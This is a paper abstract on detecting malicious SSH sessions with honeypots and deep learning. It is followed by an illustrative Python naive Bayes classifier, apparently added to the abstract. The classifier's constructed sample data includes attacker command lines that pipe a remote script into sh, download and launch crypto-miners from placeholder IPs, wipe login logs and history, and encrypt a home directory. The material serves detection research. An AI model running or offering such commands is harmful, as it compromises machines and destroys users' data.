Malicious User Profiling Using Honeypots and Deep Learning

Roy Levin, Mathias Scherman, Hana Matatov

Lecture Notes in Networks and Systems: Advances in Information and Communication (2022)

Abstract
Many cloud resources such as virtual machines are managed through remote access. This makes management far more convenient; however, it also increases exposure to cyber-attacks, and specifically to generic attacks such as Bitcoin mining, spamming, ransomware, installing backdoors, etc. With the proliferation of such attacks, their detection has become of major importance. In this paper we present a new supervised learning technique developed to learn and detect the patterns behind these kinds of attacks. The goal is to continuously distinguish between benign and malicious SSH logon sessions. We formulate this as a classification task where a model is trained on benign and malicious SSH sessions. The benign sessions are collected from security-hardened machines lacking any attack indicators, and the malicious sessions are gathered from dedicated Honeypot machines set up for the sole purpose of luring attackers. As the Honeypots are not actually a part of any real network, only generic attackers log onto them, usually by sweeping IP addresses and guessing passwords. We then train a Deep Neural Net (DNN) to classify the sessions as benign or malicious. Our experiments show that the Average Precision (AP) of this model reaches up to 99%. We also show that simpler ML models achieve an AP that is significantly lower. This indicates that learning the attack patterns is not a task which can effectively be mastered by traditional models; hence it is not a trivial task. In addition to statistical measures, we also analyze and present sessions from customer VMs which have been surfaced by the DNN. We manually examined these sessions to show that most of them actually require the attention of security professionals. Among these sessions we witnessed typical attack patterns, which include reconnaissance, running Bitcoin miners, ransomware and other suspicious processes on target machines.
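The abstract describes the task at a high level: sessions labelled benign (from hardened hosts) or malicious (from honeypots), a classifier trained on them, and Average Precision as the headline metric. The following is an added illustration and is not the paper's code or model: a bag-of-commands naive Bayes classifier stands in for the paper's DNN so that the whole pipeline (tokenising SSH sessions into command names, fitting on labelled sessions, scoring held-out sessions, computing AP) fits in one runnable script. All session transcripts, IP addresses and labels below are constructed for the example; the paper's feature representation and network architecture are not stated in the abstract and are not reproduced here.

```python
import math
import re
from collections import Counter

# Constructed training corpus (not the paper's data): each entry is the list of
# command lines typed in one SSH session and a label (1 = malicious, 0 = benign).
# Benign sessions imitate routine administration on a hardened host; malicious
# ones imitate the generic honeypot patterns the abstract mentions (host
# reconnaissance, dropping a miner, wiping traces).
TRAIN_SESSIONS = [
    (["ls -la", "cat /etc/os-release", "sudo apt update", "sudo apt install -y nginx", "systemctl status nginx"], 0),
    (["cd /var/www", "git pull", "npm install", "npm run build", "exit"], 0),
    (["df -h", "free -m", "tail -n 100 /var/log/syslog", "journalctl -u sshd"], 0),
    (["vim /etc/nginx/nginx.conf", "nginx -t", "systemctl reload nginx"], 0),
    (["uname -a", "cat /proc/cpuinfo", "nproc", "wget http://198.51.100.7/x86_64 -O /tmp/kworker",
      "chmod +x /tmp/kworker", "/tmp/kworker -o pool.example:3333"], 1),
    (["cat /proc/cpuinfo | grep name", "crontab -l", "curl -s http://203.0.113.5/a.sh | sh", "history -c"], 1),
    (["uname -a", "nproc", "wget http://203.0.113.9/mnr", "chmod 777 mnr", "nohup ./mnr &", "rm -rf /var/log/wtmp"], 1),
    (["cd /tmp", "curl -O http://198.51.100.3/encrypt.py", "python encrypt.py /home", "echo pay > README.txt"], 1),
]

# Constructed held-out sessions used to report AP, as the paper does on its test set.
HELDOUT_SESSIONS = [
    (["ls", "sudo apt upgrade -y", "systemctl restart nginx"], 0),
    (["uname -a", "nproc", "wget http://203.0.113.4/kworker", "chmod +x kworker", "nohup ./kworker &"], 1),
    (["git status", "npm test"], 0),
    (["cat /proc/cpuinfo", "curl -s http://198.51.100.8/s.sh | sh", "history -c"], 1),
]


def tokenize(session):
    """Reduce a session to the sequence of command names it invokes.

    Each line is split at pipes and command separators and the first word of
    every segment is kept, so arguments and download URLs do not become features.
    """
    tokens = []
    for line in session:
        for segment in re.split(r"\||;|&&", line):
            parts = segment.split()
            if parts:
                tokens.append(parts[0])
    return tokens


class BagOfCommandsNB:
    """Multinomial naive Bayes over command names with Laplace smoothing.

    This is a deliberately simple stand-in for the paper's DNN; the abstract
    reports that such simpler models reach a markedly lower AP on real data.
    """

    def __init__(self, alpha=1.0):
        self.alpha = alpha
        self.counts = {0: Counter(), 1: Counter()}  # token counts per class
        self.docs = {0: 0, 1: 0}                    # session counts per class
        self.vocab = set()

    def fit(self, sessions):
        for cmds, label in sessions:
            toks = tokenize(cmds)
            self.counts[label].update(toks)
            self.docs[label] += 1
            self.vocab.update(toks)
        return self

    def _log_prob(self, tokens, label):
        total = sum(self.counts[label].values())
        denom = total + self.alpha * len(self.vocab)
        lp = math.log(self.docs[label] / sum(self.docs.values()))
        for t in tokens:
            lp += math.log((self.counts[label][t] + self.alpha) / denom)
        return lp

    def score(self, cmds):
        """Posterior probability that the session is malicious (0..1)."""
        toks = tokenize(cmds)
        lp0, lp1 = self._log_prob(toks, 0), self._log_prob(toks, 1)
        m = max(lp0, lp1)  # shift before exponentiating to avoid underflow
        return math.exp(lp1 - m) / (math.exp(lp0 - m) + math.exp(lp1 - m))


def average_precision(scores, labels):
    """Average Precision: mean of precision@k over the ranks k of each positive."""
    order = sorted(range(len(scores)), key=lambda i: -scores[i])
    hits, precision_sum = 0, 0.0
    for rank, i in enumerate(order, start=1):
        if labels[i] == 1:
            hits += 1
            precision_sum += hits / rank
    return precision_sum / max(1, sum(labels))


def evaluate(train=TRAIN_SESSIONS, heldout=HELDOUT_SESSIONS):
    """Fit on the training sessions and return (scores, labels, AP) on held-out ones."""
    model = BagOfCommandsNB().fit(train)
    scores = [model.score(cmds) for cmds, _ in heldout]
    labels = [label for _, label in heldout]
    return scores, labels, average_precision(scores, labels)


if __name__ == "__main__":
    scores, labels, ap = evaluate()
    for (cmds, _), s, y in zip(HELDOUT_SESSIONS, scores, labels):
        print(f"label={y} score={s:.3f} {' ; '.join(cmds)}")
    print(f"Average Precision: {ap:.3f}")
```

Two points carry over to the real setting. AP is computed on the ranking, not on a fixed threshold, which is why it suits a triage queue where analysts review the highest-scoring customer sessions first, exactly the manual review the abstract describes. And a bag-of-commands model cannot see ordering (reconnaissance followed by a download followed by execution), which is one reason a sequence-aware DNN can separate the classes better than the traditional models the paper compares against.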
Keywords
malicious user profiling, honeypots, deep learning